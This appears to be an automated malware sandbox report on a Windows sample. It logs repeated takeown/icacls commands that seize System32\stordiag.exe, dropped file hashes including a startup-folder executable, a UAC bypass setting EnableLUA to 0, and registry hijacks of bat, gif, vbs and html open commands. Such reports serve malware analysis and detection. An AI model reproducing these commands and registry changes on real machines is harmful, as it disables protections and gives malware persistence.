C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "120839374-367117722-2060742768144387948214353184922030831895-1007722331-1868571432"

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "976119717-1221544081721948058485745835299664124569137448167989005-979890006"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1392364366859130352248393155-2584578047116125181051970474-2039034854-655957556"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1940624636-392435160-550185710129012166-54347679635329101569310007131860601"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-108151398153832787-992284616-9197500151709581483-1192210948-8865977141884298329"

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

Network

N/A

Files

memory/2084-0-0x000007FEF55A3000-0x000007FEF55A4000-memory.dmp

memory/2084-1-0x0000000000F60000-0x0000000000F88000-memory.dmp

memory/2084-2-0x000007FEF55A0000-0x000007FEF5F8C000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AuF8OrQFZQe.exe

MD5 6ee7bee8dd7e1c5a8897f58c33b9fac3
SHA1 45f5551a38ff1c0c60ed63be5dca267bb65238e8
SHA256 080d787304db0ec177e6a086ac318092723486d558d36d66f505ea821f5842c5
SHA512 c1a1e90b4dadedd8b031e4b6fdb249d41ababe62cf4101dd018e8fab1008d207b7eba1beb54163d37ced355568bf757186bb152bad004a3cbdac3232ecab0304

memory/2084-1136-0x000007FEF55A3000-0x000007FEF55A4000-memory.dmp

memory/2084-1269-0x000007FEF55A0000-0x000007FEF5F8C000-memory.dmp

C:\Windows\System32\stordiag.exe

MD5 749c23800de277b79a37e6717d33c05a
SHA1 5efe3f5c2f981c486350b40916459ec3dc05eb70
SHA256 4cdce1f56a6d63e7c35d9c32265f131143328720d04c89ab821caf2f63ab4c93
SHA512 97814d9c043938f7987e75e55e107210f498bdf631fe3eff0673297b02cebab70e82d3fab448c83caf9c0475173be3c2c67b956d448208ebe71a5b466f74f7ed

C:\Windows\System32\stordiag.exe

MD5 423a2bef39ce629cd3bb01e21978153c
SHA1 e35404c03da1fa3b3eadd75c7448ed0971d0e375
SHA256 aba4537a415911a98134678f808e26b1a862bbec916dc6f53de2fd1a5e3df3a1
SHA512 132572dc3cde2524f9a3035d312dcee6dafc314969c2cbf4112ee1f7c9e83416a4ba0f16fbc95b1a4b1429370b25067a25847bff65a56cbb7c28c3a6d9a0defe

C:\Windows\System32\stordiag.exe

MD5 2fd5a7ae68af92fb86cf43d57d1997cc
SHA1 4558bdf09fe9b33d24cfb08ede5c63b40804e42c
SHA256 880eceb309f2ca7a9ea12c3bb0c17d3022aace9343d89e98580755de6645805f
SHA512 7f8532db6817bbd6e6dacc7d270069d43198dc3f874c453ae2281fcc441c934a68e6ce85177ab6bf7544a356bdf3ea08636eebb39fda56b22691a0b8c449660e

C:\Windows\System32\stordiag.exe

MD5 64fd98eb25246602d933e54ba9b454a2
SHA1 bb628dfe2c980a9ee00f7c1998374297d9ac2edd
SHA256 bd3d8b57728d50550ae88d8b12de79b14cf0b7ceffea1c18c17b1df2da240bf3
SHA512 0482760618600284dd5223dcb5b149d19655a5e2152bdb4306b032a5a6303a87fea767cb3e3dd04946df418e622b0744fb65eb99dc98669b96d2429c13f02ddf

C:\Windows\System32\stordiag.exe

MD5 ba66f706be8f7adbcffe87f740255b80
SHA1 6495fda80f1d1b5d8b5299128d2d75c5a079e437
SHA256 e83d3717a2237dcaba64b38240cafc500c30978549d60e44e1adf7de8e1defac
SHA512 7c771787e784564c40e23deafa3163576d2c538efae91ca192baccf53b91badc7c76293917d34357e8446fdf17628efd3a3aeea7502fa5f602240c8d6e6fd9a9

C:\Windows\System32\stordiag.exe

MD5 c3c70582949bd5eb04094d377a177421
SHA1 3f7369db4cb4340c72d850f61b66342e9f72fc1d
SHA256 d9926d8e5a4210dd00008ec982b87f8c2bd83003fb2e836c619be311a998da43
SHA512 bf8ed67d211063f1f52ccaa6621653ba4f17de2eff41f44da22b6b10e09cb65b8e7ce27d97673be5d5e9e3f441e565ee444755fc39bd942ee8b337ac8520dfe8

C:\Windows\System32\stordiag.exe

MD5 9add874e18dd6ac82b62d05931f8ba8e
SHA1 7f791f2a04c200c1162b71ca8cfb0f1ab81e5b3e
SHA256 9cf29940244bcabcd0089de4362ddc5d99012e689d97bcc2517df8e946b6bab7
SHA512 b7eb0ebd5acdc67755884442b139d163ac384613733cee8ce1394d01ebd51e55857ed4f2c196d3cca02020af7895eb1ec7e29667bb5998f7a5d519c22b3c76a6

C:\Windows\System32\stordiag.exe

MD5 ee121d7d851e08c3db7d23905309a4c4
SHA1 896507fa433fc80fb9d1e406ec3c206c009df779
SHA256 5feb5a59fe19ed73e9c3902cbf748596905a50801fce620e34b76e6bf061a9bb
SHA512 e50397262b3a665bdfa85a14c627666c295d0a78c4ce798db92ffc91143fc61a38f09dadc4188aaa8f5f26899befdec0c6d49c72f0760beab7b4c7cbea65f37c

C:\Windows\System32\stordiag.exe

MD5 89924677e9bfd8083448419a882950c6
SHA1 83a560187d24457003403a70b133906dd2169cd4
SHA256 7c41eabecc24e523c471266cdb14a96631f0e1836a53f29e5b59d9a4b7a0e3b9
SHA512 84b68a9ba11a6b39fff6d654f09e17ff72f7115605863475880ffd777aceacb2149c2f9b0254b14f2450c837ad33513d91106663def4990acee314691be9b5c9

C:\Windows\System32\stordiag.exe

MD5 6324d8a6e98fb140f84d563824be6df0
SHA1 b4997cb942431b3a38c8664fd065f15628e4498d
SHA256 4e3fdb4f870587ce7746674a0efb81b7d3dc20d0ceed4dd75e72af4b8c9b5cde
SHA512 fbe4abb95d7ee8bcc605d13b1d132ca8760ffb1983b32ef666a6ca09c409a8f20dff8498deef0006ab40704af4e9f03daf72e71759fa0deac2526b14c2ff6f88

C:\Windows\System32\stordiag.exe

MD5 6686f74b2d4981502a570455a7fd32bb
SHA1 38625e63f164ab074a3aaba537f2cf76a8ab3f93
SHA256 12ab12db4abad721a3be04c0be4db329e1aa905e4032c62da8e138f1af203477
SHA512 ee3b1dee40849b04f3eb319c36861ec993aa4ea313978c16138bdf6209dfd4d3578aa41de7feeada52e58bd9a08fbf3f3292770a9522bd7bae79f30ec27f5ae0

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-10 15:42

Reported

2024-10-10 15:45

Platform

win10v2004-20241007-en

Max time kernel

124s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\mode.com C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe VBSSF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe HTMWF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
